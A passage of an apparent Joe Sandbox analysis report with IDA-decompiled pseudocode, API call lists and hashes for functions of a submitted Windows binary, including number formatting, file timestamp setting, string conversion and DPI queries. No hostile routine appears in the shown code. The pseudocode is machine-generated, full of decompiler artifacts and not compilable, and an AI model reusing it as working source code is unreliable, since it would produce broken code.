                                                    							} while (_t93 >= 0);
                                                    							__eflags = _t93;
                                                    							if(_t93 < 0) {
                                                    								goto L39;
                                                    							}
                                                    							_t115 = E00CDEE10( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
                                                    							__eflags = _t115 - 8;
                                                    							if(_t115 <= 8) {
                                                    								goto L39;
                                                    							}
                                                    							_t54 = _t186 - 1; // 0xce52a1
                                                    							_t116 = _t54;
                                                    							_t138 = 0x30;
                                                    							while(1) {
                                                    								_t156 =  *_t116;
                                                    								__eflags = _t156 - 0x66;
                                                    								if(_t156 == 0x66) {
                                                    									goto L33;
                                                    								}
                                                    								__eflags = _t156 - 0x46;
                                                    								if(_t156 != 0x46) {
                                                    									_t139 = _v32;
                                                    									__eflags = _t116 - _v28;
                                                    									if(_t116 == _v28) {
                                                    										_t57 = _t116 - 1;
                                                    										 *_t57 =  *(_t116 - 1) + 1;
                                                    										__eflags =  *_t57;
                                                    									} else {
                                                    										_t157 =  *_t116;
                                                    										__eflags = _t157 - 0x39;
                                                    										if(_t157 != 0x39) {
                                                    											 *_t116 = _t157 + 1;
                                                    										} else {
                                                    											 *_t116 = _t139 + 0x3a;
                                                    										}
                                                    									}
                                                    									goto L39;
                                                    								}
                                                    								L33:
                                                    								 *_t116 = _t138;
                                                    								_t116 = _t116 - 1;
                                                    							}
                                                    						} else {
                                                    							__eflags =  *_t172;
                                                    							if( *_t172 <= 0) {
                                                    								L39:
                                                    								__eflags = _t181;
                                                    								if(_t181 > 0) {
                                                    									_push(_t181);
                                                    									_t111 = 0x30;
                                                    									_push(_t111);
                                                    									_push(_t186);
                                                    									E00CDFFF0(_t181);
                                                    									_t186 = _t186 + _t181;
                                                    									__eflags = _t186;
                                                    								}
                                                    								_t94 = _v28;
                                                    								__eflags =  *_t94;
                                                    								if( *_t94 == 0) {
                                                    									_t186 = _t94;
                                                    								}
                                                    								__eflags = _a28;
                                                    								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                    								_t174 = _a4[1];
                                                    								_t100 = E00CDEE10( *_a4, 0x34, _t174);
                                                    								_t137 = 0;
                                                    								_t151 = (_t100 & 0x000007ff) - _v16;
                                                    								__eflags = _t151;
                                                    								asm("sbb ebx, ebx");
                                                    								if(__eflags < 0) {
                                                    									L47:
                                                    									 *(_t186 + 1) = 0x2d;
                                                    									_t187 = _t186 + 2;
                                                    									__eflags = _t187;
                                                    									_t151 =  ~_t151;
                                                    									asm("adc ebx, 0x0");
                                                    									_t137 =  ~_t137;
                                                    									goto L48;
                                                    								} else {
                                                    									if(__eflags > 0) {
                                                    										L46:
                                                    										 *(_t186 + 1) = 0x2b;
                                                    										_t187 = _t186 + 2;
                                                    										L48:
                                                    										_t182 = _t187;
                                                    										_t101 = 0x30;
                                                    										 *_t187 = _t101;
                                                    										__eflags = _t137;
                                                    										if(__eflags < 0) {
                                                    											L56:
                                                    											__eflags = _t187 - _t182;
                                                    											if(_t187 != _t182) {
                                                    												L60:
                                                    												_push(0);
                                                    												_push(0xa);
                                                    												_push(_t137);
                                                    												_push(_t151);
                                                    												_t102 = E00CF2260();
                                                    												_v32 = _t174;
                                                    												 *_t187 = _t102 + 0x30;
                                                    												_t187 = _t187 + 1;
                                                    												__eflags = _t187;
                                                    												L61:
                                                    												_t104 = 0x30;
                                                    												_t183 = 0;
                                                    												__eflags = 0;
                                                    												 *_t187 = _t151 + _t104;
                                                    												 *(_t187 + 1) = 0;
                                                    												goto L62;
                                                    											}
                                                    											__eflags = _t137;
                                                    											if(__eflags < 0) {
                                                    												goto L61;
                                                    											}
                                                    											if(__eflags > 0) {
                                                    												goto L60;
                                                    											}
                                                    											__eflags = _t151 - 0xa;
                                                    											if(_t151 < 0xa) {
                                                    												goto L61;
                                                    											}
                                                    											goto L60;
                                                    										}
                                                    										if(__eflags > 0) {
                                                    											L51:
                                                    											_push(0);
                                                    											_push(0x3e8);
                                                    											_push(_t137);
                                                    											_push(_t151);
                                                    											_t107 = E00CF2260();
                                                    											_v32 = _t174;
                                                    											 *_t187 = _t107 + 0x30;
                                                    											_t187 = _t187 + 1;
                                                    											__eflags = _t187 - _t182;
                                                    											if(_t187 != _t182) {
                                                    												L55:
                                                    												_push(0);
                                                    												_push(0x64);
                                                    												_push(_t137);
                                                    												_push(_t151);
                                                    												_t109 = E00CF2260();
                                                    												_v32 = _t174;
                                                    												 *_t187 = _t109 + 0x30;
                                                    												_t187 = _t187 + 1;
                                                    												__eflags = _t187;
                                                    												goto L56;
                                                    											}
                                                    											L52:
                                                    											__eflags = _t137;
                                                    											if(__eflags < 0) {
                                                    												goto L56;
                                                    											}
                                                    											if(__eflags > 0) {
                                                    												goto L55;
                                                    											}
                                                    											__eflags = _t151 - 0x64;
                                                    											if(_t151 < 0x64) {
                                                    												goto L56;
                                                    											}
                                                    											goto L55;
                                                    										}
                                                    										__eflags = _t151 - 0x3e8;
                                                    										if(_t151 < 0x3e8) {
                                                    											goto L52;
                                                    										}
                                                    										goto L51;
                                                    									}
                                                    									__eflags = _t151;
                                                    									if(_t151 < 0) {
                                                    										goto L47;
                                                    									}
                                                    									goto L46;
                                                    								}
                                                    							}
                                                    							goto L23;
                                                    						}
                                                    					}
                                                    					__eflags = 0;
                                                    					if(0 != 0) {
                                                    						goto L11;
                                                    					} else {
                                                    						_t183 = E00CE9D21(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
                                                    						__eflags = _t183;
                                                    						if(_t183 == 0) {
                                                    							_t128 = E00CF2430(_t184, 0x65);
                                                    							_pop(_t166);
                                                    							__eflags = _t128;
                                                    							if(_t128 != 0) {
                                                    								__eflags = _a28;
                                                    								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
                                                    								__eflags = _t170;
                                                    								 *_t128 = _t170;
                                                    								 *((char*)(_t128 + 3)) = 0;
                                                    							}
                                                    							_t183 = 0;
                                                    						} else {
                                                    							 *_t184 = 0;
                                                    						}
                                                    						goto L62;
                                                    					}
                                                    				} else {
                                                    					_t129 = E00CE91A8();
                                                    					_t183 = 0x22;
                                                    					 *_t129 = _t183;
                                                    					E00CE9087();
                                                    					L62:
                                                    					if(_v40 != 0) {
                                                    						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
                                                    					}
                                                    					return _t183;
                                                    				}
                                                    			}

























































                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: __alldvrm$_strrchr
                                                    • String ID:
                                                    • API String ID: 1036877536-0
                                                    • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                    • Instruction ID: dca5b8bada69054903b2213cd211d64a7f997d63a332122d50bb88e43033809f
                                                    • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                    • Instruction Fuzzy Hash: 19A17A72A007C69FEB21DF2AC8817BEBBE5EF55310F2841ADE5959B381C2388E41C751
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 94%
                                                    			E00CCA354(void* __edx) {
                                                    				signed char _t41;
                                                    				void* _t42;
                                                    				void* _t53;
                                                    				signed char _t70;
                                                    				void* _t78;
                                                    				signed int* _t79;
                                                    				signed int* _t80;
                                                    				void* _t81;
                                                    				signed int* _t82;
                                                    				void* _t83;
                                                    
                                                    				_t78 = __edx;
                                                    				E00CDEC50(0x1024);
                                                    				_t80 =  *(_t83 + 0x1038);
                                                    				_t70 = 1;
                                                    				if(_t80 == 0) {
                                                    					L2:
                                                    					 *(_t83 + 0x11) = 0;
                                                    					L3:
                                                    					_t79 =  *(_t83 + 0x1040);
                                                    					if(_t79 == 0) {
                                                    						L5:
                                                    						 *(_t83 + 0x13) = 0;
                                                    						L6:
                                                    						_t82 =  *(_t83 + 0x1044);
                                                    						if(_t82 == 0) {
                                                    							L8:
                                                    							 *(_t83 + 0x12) = 0;
                                                    							L9:
                                                    							_t41 = E00CCA243( *(_t83 + 0x1038));
                                                    							 *(_t83 + 0x18) = _t41;
                                                    							if(_t41 == 0xffffffff || (_t70 & _t41) == 0) {
                                                    								_t70 = 0;
                                                    							} else {
                                                    								E00CCA4ED( *((intOrPtr*)(_t83 + 0x103c)), 0);
                                                    							}
                                                    							_t42 = CreateFileW( *(_t83 + 0x1050), 0x40000000, 3, 0, 3, 0x2000000, 0);
                                                    							 *(_t83 + 0x14) = _t42;
                                                    							if(_t42 != 0xffffffff) {
                                                    								L16:
                                                    								if( *(_t83 + 0x11) != 0) {
                                                    									E00CD138A(_t80, _t78, _t83 + 0x1c);
                                                    								}
                                                    								if( *(_t83 + 0x13) != 0) {
                                                    									E00CD138A(_t79, _t78, _t83 + 0x2c);
                                                    								}
                                                    								if( *(_t83 + 0x12) != 0) {
                                                    									E00CD138A(_t82, _t78, _t83 + 0x24);
                                                    								}
                                                    								_t81 =  *(_t83 + 0x14);
                                                    								asm("sbb eax, eax");
                                                    								asm("sbb eax, eax");
                                                    								asm("sbb eax, eax");
                                                    								SetFileTime(_t81,  ~( *(_t83 + 0x1b) & 0x000000ff) & _t83 + 0x00000030,  ~( *(_t83 + 0x16) & 0x000000ff) & _t83 + 0x00000024,  ~( *(_t83 + 0x11) & 0x000000ff) & _t83 + 0x0000001c);
                                                    								_t53 = CloseHandle(_t81);
                                                    								if(_t70 != 0) {
                                                    									_t53 = E00CCA4ED( *((intOrPtr*)(_t83 + 0x103c)),  *(_t83 + 0x18));
                                                    								}
                                                    								goto L24;
                                                    							} else {
                                                    								_t53 = E00CCBB03( *(_t83 + 0x1040), _t83 + 0x38, 0x800);
                                                    								if(_t53 == 0) {
                                                    									L24:
                                                    									return _t53;
                                                    								}
                                                    								_t53 = CreateFileW(_t83 + 0x4c, 0x40000000, 3, 0, 3, 0x2000000, 0);
                                                    								 *(_t83 + 0x14) = _t53;
                                                    								if(_t53 == 0xffffffff) {
                                                    									goto L24;
                                                    								}
                                                    								goto L16;
                                                    							}
                                                    						}
                                                    						 *(_t83 + 0x12) = _t70;
                                                    						if(( *_t82 | _t82[1]) != 0) {
                                                    							goto L9;
                                                    						}
                                                    						goto L8;
                                                    					}
                                                    					 *(_t83 + 0x13) = _t70;
                                                    					if(( *_t79 | _t79[1]) != 0) {
                                                    						goto L6;
                                                    					}
                                                    					goto L5;
                                                    				}
                                                    				 *(_t83 + 0x11) = 1;
                                                    				if(( *_t80 | _t80[1]) != 0) {
                                                    					goto L3;
                                                    				}
                                                    				goto L2;
                                                    			}














                                                    APIs
                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00CC7F69,?,?,?), ref: 00CCA3FA
                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00CC7F69,?), ref: 00CCA43E
                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00CC7F69,?,?,?,?,?,?,?), ref: 00CCA4BF
                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00CC7F69,?,?,?,?,?,?,?,?,?,?), ref: 00CCA4C6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: File$Create$CloseHandleTime
                                                    • String ID:
                                                    • API String ID: 2287278272-0
                                                    • Opcode ID: 08874bec49adb39a966ae173e9193d0d70c43383cd723800554ec9062d185f1a
                                                    • Instruction ID: b1df3c4c68b0fd447dfe45b1e300c41e6a941d0b59d2329ee5f79b29230e6cee
                                                    • Opcode Fuzzy Hash: 08874bec49adb39a966ae173e9193d0d70c43383cd723800554ec9062d185f1a
                                                    • Instruction Fuzzy Hash: AD41CF31248385AAD725DF24DC59FAEBBE4AB84308F08491DF5E1D3190D6A4DB48DB53
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 52%
                                                    			E00CC1100(intOrPtr _a4, intOrPtr _a8, short* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                    				intOrPtr _v40;
                                                    				intOrPtr _v44;
                                                    				intOrPtr _v60;
                                                    				short* _v64;
                                                    				char* _v80;
                                                    				intOrPtr _v84;
                                                    				intOrPtr _v88;
                                                    				char _v92;
                                                    				char _v1114;
                                                    				char _v1116;
                                                    				void* __edi;
                                                    				signed int _t44;
                                                    				signed int _t52;
                                                    				intOrPtr _t67;
                                                    				short* _t80;
                                                    				void* _t83;
                                                    				char _t84;
                                                    				signed int _t85;
                                                    				void* _t87;
                                                    				signed int _t97;
                                                    
                                                    				_t79 = _a16;
                                                    				_t81 =  &_v1116;
                                                    				if(_a16 != 0) {
                                                    					E00CD0602( &_v1116, _t79, 0x200);
                                                    					_t87 =  &_v1114 + E00CE3E13( &_v1116) * 2;
                                                    					E00CD0602(_t87, _t79, 0x200 - (_t87 -  &_v1116 >> 1));
                                                    					_t81 = _t87 + E00CE3E13(_t87) * 2 + 2;
                                                    				}
                                                    				E00CD0602(_t81, E00CCE617(0xa3), 0x200 - (_t81 -  &_v1116 >> 1));
                                                    				_t83 = _t81 + E00CE3E13(_t81) * 2 + 2;
                                                    				E00CD0602(_t83, 0xcf35f0, 0x200 - (_t83 -  &_v1116 >> 1));
                                                    				_t44 = E00CE3E13(_t83);
                                                    				 *((short*)(_t83 + 2 + _t44 * 2)) = 0;
                                                    				_t84 = 0x58;
                                                    				E00CDFFF0(_t79,  &_v92, 0, _t84);
                                                    				_t67 = _a20;
                                                    				_t80 = _a12;
                                                    				_v88 = _a4;
                                                    				_v84 =  *0xd01028;
                                                    				_v80 =  &_v1116;
                                                    				_v44 = _a8;
                                                    				_v92 = _t84;
                                                    				_v64 = _t80;
                                                    				_v60 = 0x800;
                                                    				_v40 = 0x1080c;
                                                    				_push( &_v92);
                                                    				if(_t67 == 0) {
                                                    					_t52 =  *0xd23044();
                                                    				} else {
                                                    					_t52 =  *0xd2303c();
                                                    				}
                                                    				_t85 = _t52;
                                                    				if(_t85 == 0) {
                                                    					_t52 =  *0xd23040();
                                                    					if(_t52 == 0x3002) {
                                                    						 *_t80 = 0;
                                                    						_push( &_v92);
                                                    						if(_t67 == 0) {
                                                    							_t52 =  *0xd23044();
                                                    						} else {
                                                    							_t52 =  *0xd2303c();
                                                    						}
                                                    						_t85 = _t52;
                                                    					}
                                                    					_t97 = _t85;
                                                    				}
                                                    				return _t52 & 0xffffff00 | _t97 != 0x00000000;
                                                    			}
























                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen
                                                    • String ID:
                                                    • API String ID: 176396367-0
                                                    • Opcode ID: 710d379ad1e368a7edb72648b81cc88c6bae82f6e8e32f8c4b82747b300cb4d9
                                                    • Instruction ID: b9b616f0f9ff8281a280dc32e29f32a83e0f5995de22f371b5ead4d43faef219
                                                    • Opcode Fuzzy Hash: 710d379ad1e368a7edb72648b81cc88c6bae82f6e8e32f8c4b82747b300cb4d9
                                                    • Instruction Fuzzy Hash: 3E41B6719006699BCB259F69CD09AEE7BB8EF01311F04401EFD45F7341DB34AE458AB0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 83%
                                                    			E00CEC988(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                    				signed int _v8;
                                                    				int _v12;
                                                    				char _v16;
                                                    				intOrPtr _v24;
                                                    				char _v28;
                                                    				void* _v40;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t34;
                                                    				signed int _t40;
                                                    				int _t46;
                                                    				int _t54;
                                                    				void* _t55;
                                                    				int _t57;
                                                    				signed int _t63;
                                                    				int _t66;
                                                    				short* _t67;
                                                    				signed int _t68;
                                                    				short* _t69;
                                                    
                                                    				_t65 = __edx;
                                                    				_t34 =  *0xcfe7ac; // 0x349e4b74
                                                    				_v8 = _t34 ^ _t68;
                                                    				E00CE4636(_t55,  &_v28, __edx, _a4);
                                                    				_t57 = _a24;
                                                    				if(_t57 == 0) {
                                                    					_t6 = _v24 + 8; // 0x2de85006
                                                    					_t54 =  *_t6;
                                                    					_t57 = _t54;
                                                    					_a24 = _t54;
                                                    				}
                                                    				_t66 = 0;
                                                    				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                    				_v12 = _t40;
                                                    				if(_t40 == 0) {
                                                    					L15:
                                                    					if(_v16 != 0) {
                                                    						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                    					}
                                                    					return E00CDFBBC(_t66, _t55, _v8 ^ _t68, _t65, _t66, _t67);
                                                    				}
                                                    				_t55 = _t40 + _t40;
                                                    				asm("sbb eax, eax");
                                                    				if((_t55 + 0x00000008 & _t40) == 0) {
                                                    					_t67 = 0;
                                                    					L11:
                                                    					if(_t67 != 0) {
                                                    						E00CDFFF0(_t66, _t67, _t66, _t55);
                                                    						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t67, _v12);
                                                    						if(_t46 != 0) {
                                                    							_t66 = GetStringTypeW(_a8, _t67, _t46, _a20);
                                                    						}
                                                    					}
                                                    					L14:
                                                    					E00CEABC3(_t67);
                                                    					goto L15;
                                                    				}
                                                    				asm("sbb eax, eax");
                                                    				_t48 = _t40 & _t55 + 0x00000008;
                                                    				_t63 = _t55 + 8;
                                                    				if((_t40 & _t55 + 0x00000008) > 0x400) {
                                                    					asm("sbb eax, eax");
                                                    					_t67 = E00CE8E06(_t63, _t48 & _t63);
                                                    					if(_t67 == 0) {
                                                    						goto L14;
                                                    					}
                                                    					 *_t67 = 0xdddd;
                                                    					L9:
                                                    					_t67 =  &(_t67[4]);
                                                    					goto L11;
                                                    				}
                                                    				asm("sbb eax, eax");
                                                    				E00CF2010(_t48 & _t63);
                                                    				_t67 = _t69;
                                                    				if(_t67 == 0) {
                                                    					goto L14;
                                                    				}
                                                    				 *_t67 = 0xcccc;
                                                    				goto L9;
                                                    			}

                                                    APIs
                                                    • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,00CE47C6,00000000,00000000,00CE57FB,?,00CE57FB,?,00000001,00CE47C6,2DE85006,00000001,00CE57FB,00CE57FB), ref: 00CEC9D5
                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00CECA5E
                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00CECA70
                                                    • __freea.LIBCMT ref: 00CECA79
                                                      • Part of subcall function 00CE8E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00CE4286,?,0000015D,?,?,?,?,00CE5762,000000FF,00000000,?,?), ref: 00CE8E38
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                    • String ID:
                                                    • API String ID: 2652629310-0
                                                    • Opcode ID: 4cecba82f7041c9310d27fae9c8b297ac9fdac5b964994306cc73a198c01d210
                                                    • Instruction ID: fccd8347f622f2fbd09f0bb9759f4caa01c782054caef3d33c722815a1c33296
                                                    • Opcode Fuzzy Hash: 4cecba82f7041c9310d27fae9c8b297ac9fdac5b964994306cc73a198c01d210
                                                    • Instruction Fuzzy Hash: 4B31D032A0024AABDF24DF66CC85EBE7BA5EB41310B044129FC15E7250EB35CE51EB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDA663() {
                                                    				struct HDC__* _t1;
                                                    				struct HDC__* _t5;
                                                    
                                                    				_t1 = GetDC(0);
                                                    				_t5 = _t1;
                                                    				if(_t5 != 0) {
                                                    					 *0xd08430 = GetDeviceCaps(_t5, 0x58);
                                                    					 *0xd08434 = GetDeviceCaps(_t5, 0x5a);
                                                    					return ReleaseDC(0, _t5);
                                                    				}
                                                    				return _t1;
                                                    			}

                                                    APIs
                                                    • GetDC.USER32(00000000), ref: 00CDA666
                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00CDA675
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CDA683
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00CDA691
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: CapsDevice$Release
                                                    • String ID:
                                                    • API String ID: 1035833867-0
                                                    • Opcode ID: 7b9ebd1f9fc24d79756ec4d58befa97d631f13e0066e121275a238fddcea5aec
                                                    • Instruction ID: 6682e51dd08cd82603d1eccb935c51377c3096ae7ba4cf8c88732c30896630c2
                                                    • Opcode Fuzzy Hash: 7b9ebd1f9fc24d79756ec4d58befa97d631f13e0066e121275a238fddcea5aec
                                                    • Instruction Fuzzy Hash: AAE0EC31942B21A7D2715F60AD0DB8A3E54AB25B52F010101FB09D6390DB6886028BB5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 22%
                                                    			E00CDA80C(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                    				signed int _v0;
                                                    				signed int _v4;
                                                    				void _v68;
                                                    				signed int _v72;
                                                    				signed int _v76;
                                                    				intOrPtr _v84;
                                                    				char _v96;
                                                    				char _v100;
                                                    				char _v104;
                                                    				char _v108;
                                                    				void* _v112;
                                                    				char _v116;
                                                    				char _v120;
                                                    				short _v122;
                                                    				short _v124;
                                                    				signed int _v128;
                                                    				intOrPtr _v132;
                                                    				signed int _v136;
                                                    				char _v140;
                                                    				intOrPtr* _v144;
                                                    				char _v156;
                                                    				intOrPtr* _v164;
                                                    				intOrPtr* _v168;
                                                    				intOrPtr _v176;
                                                    				char _v180;
                                                    				char _v184;
                                                    				intOrPtr* _v196;
                                                    				intOrPtr _v212;
                                                    				signed int _v216;
                                                    				signed int _v220;
                                                    				void* _v224;
                                                    				char _v228;
                                                    				intOrPtr _v232;
                                                    				intOrPtr* _v236;
                                                    				intOrPtr* _v244;
                                                    				void* _v256;
                                                    				void* _v260;
                                                    				intOrPtr* _v268;
                                                    				intOrPtr* _t94;
                                                    				void* _t96;
                                                    				intOrPtr* _t97;
                                                    				signed int _t100;
                                                    				intOrPtr* _t103;
                                                    				intOrPtr* _t106;
                                                    				short _t114;
                                                    				intOrPtr _t117;
                                                    				intOrPtr* _t118;
                                                    				intOrPtr* _t121;
                                                    				intOrPtr* _t124;
                                                    				intOrPtr* _t130;
                                                    				signed int _t133;
                                                    				intOrPtr* _t139;
                                                    				intOrPtr* _t143;
                                                    				void* _t148;
                                                    				signed int _t150;
                                                    				intOrPtr* _t156;
                                                    				intOrPtr* _t166;
                                                    				intOrPtr* _t169;
                                                    				char _t180;
                                                    				void* _t182;
                                                    				intOrPtr* _t186;
                                                    				signed int _t198;
                                                    				long long* _t202;
                                                    				long long _t204;
                                                    
                                                    				_t204 = __fp0;
                                                    				_t202 =  &_v112;
                                                    				if(E00CDA699() != 0) {
                                                    					_t148 = _a4;
                                                    					GetObjectW(_t148, 0x18,  &_v68);
                                                    					_t150 = _v4;
                                                    					asm("cdq");
                                                    					_t198 = _v72 * _t150 / _v76;
                                                    					if(_t198 >= _v0) {
                                                    						_t198 = _v0;
                                                    					}
                                                    					if(_t150 != _v76 || _t198 != _v72) {
                                                    						_t180 = 0;
                                                    						_push( &_v124);
                                                    						_push(0xcf4754);
                                                    						_push(1);
                                                    						_push(0);
                                                    						_push(0xcf555c);
                                                    						if( *0xd23188() >= 0) {
                                                    							_t94 = _v144;
                                                    							 *0xcf3278(_t94, _t148, 0, 2,  &_v140, _t182);
                                                    							_t96 =  *((intOrPtr*)( *_t94 + 0x54))();
                                                    							_t97 = _v164;
                                                    							if(_t96 < 0) {
                                                    								L14:
                                                    								 *0xcf3278(_t97);
                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_t97 + 8))))();
                                                    								L21:
                                                    								_t100 =  *0xd230e4(_t148, _t180, _t180, _t180, _t180);
                                                    								L22:
                                                    								goto L23;
                                                    							}
                                                    							_v156 = 0;
                                                    							_t186 =  *((intOrPtr*)( *_t97 + 0x28));
                                                    							_t156 = _t186;
                                                    							 *0xcf3278(_t97,  &_v156);
                                                    							if( *_t186() < 0) {
                                                    								L13:
                                                    								_t103 = _v168;
                                                    								 *0xcf3278(_t103);
                                                    								 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 8))))();
                                                    								_t97 = _v176;
                                                    								goto L14;
                                                    							}
                                                    							_t106 = _v164;
                                                    							asm("fldz");
                                                    							 *_t202 = _t204;
                                                    							 *0xcf3278(_t106, _v168, 0xcf556c, 0, 0, _t156, _t156, 0);
                                                    							if( *((intOrPtr*)( *_t106 + 0x20))() >= 0) {
                                                    								_v132 = _v84;
                                                    								_v116 = 0;
                                                    								_v128 =  ~_t198;
                                                    								_v112 = 0;
                                                    								_v124 = 1;
                                                    								_t114 = 0x20;
                                                    								_v122 = _t114;
                                                    								_v108 = 0;
                                                    								_v104 = 0;
                                                    								_v100 = 0;
                                                    								_v96 = 0;
                                                    								_v136 = 0x28;
                                                    								_v120 = 0;
                                                    								_v184 = 0;
                                                    								_t117 =  *0xd23058(0,  &_v136, 0,  &_v180, 0, 0);
                                                    								_v212 = _t117;
                                                    								if(_t117 != 0) {
                                                    									_t166 = _v228;
                                                    									 *0xcf3278(_t166,  &_v216);
